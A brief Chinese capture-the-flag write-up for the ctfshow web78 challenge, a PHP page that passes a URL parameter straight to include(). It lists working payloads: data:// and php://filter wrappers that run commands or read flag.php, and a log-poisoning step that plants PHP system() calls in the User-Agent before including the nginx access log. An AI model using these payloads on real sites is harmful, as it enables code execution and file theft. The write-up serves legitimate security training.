[ctfshow web入门] web78

一口一个橘子2025-06-04 19:01

信息收集

表面上没有任何过滤,自由发挥

php 复制代码 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

这些解法都在web32解释过,不再详细解释,有需要点击超链接:[ctfshow web入门] web32

伪协议

php 复制代码 
?file=data://text/plain,<?php system("tac flag.php") ?>
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

日志包含

php 复制代码 
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码 
<?php system('ls'); ?>
<?php system('tac flag.php'); ?>

web124    目录    web79

相关推荐
VcB之殇8 分钟前
popstate监听浏览器的前进后退事件
前端·javascript·vue.js
宁雨桥17 分钟前
Vue组件初始化时序与异步资源加载的竞态问题实战解析
前端·javascript·vue.js
JIngJaneIL1 小时前
基于java+ vue家庭理财管理系统(源码+数据库+文档)
java·开发语言·前端·数据库·vue.js·spring boot
GISer_Jing1 小时前
Taro跨端开发实战:JX首页实现_Trae SOLO构建
前端·javascript·aigc·taro
vipbic1 小时前
基于 Nuxt 4 + Strapi 5 构建高性能 AI 导航站
前端·后端
不要em0啦1 小时前
从0开始学python:简单的练习题3
开发语言·前端·python
老华带你飞1 小时前
电商系统|基于java + vue电商系统(源码+数据库+文档)
java·开发语言·前端·数据库·vue.js·spring boot·后端
大猫会长2 小时前
关于http状态码4xx与5xx的背锅问题
前端
喝拿铁写前端2 小时前
AI 驱动前端开发覆盖的能力全景拆解
前端·javascript·人工智能
1024小神2 小时前
确认了,Cloudflare的R2对象存储S3接口api不支持在web端使用
前端
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03电脑检测软件—图吧工具箱04Web安全中SQL注入绕过WAF的具体手法和实战案例05Linux下V2Ray安装配置指南063D 圣诞树网页代码07UV安装并设置国内源08SQLmap 完整使用指南:环境搭建 + 命令详解 + 实操案例09jdk21下载、安装(Windows、Linux、macOS)10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)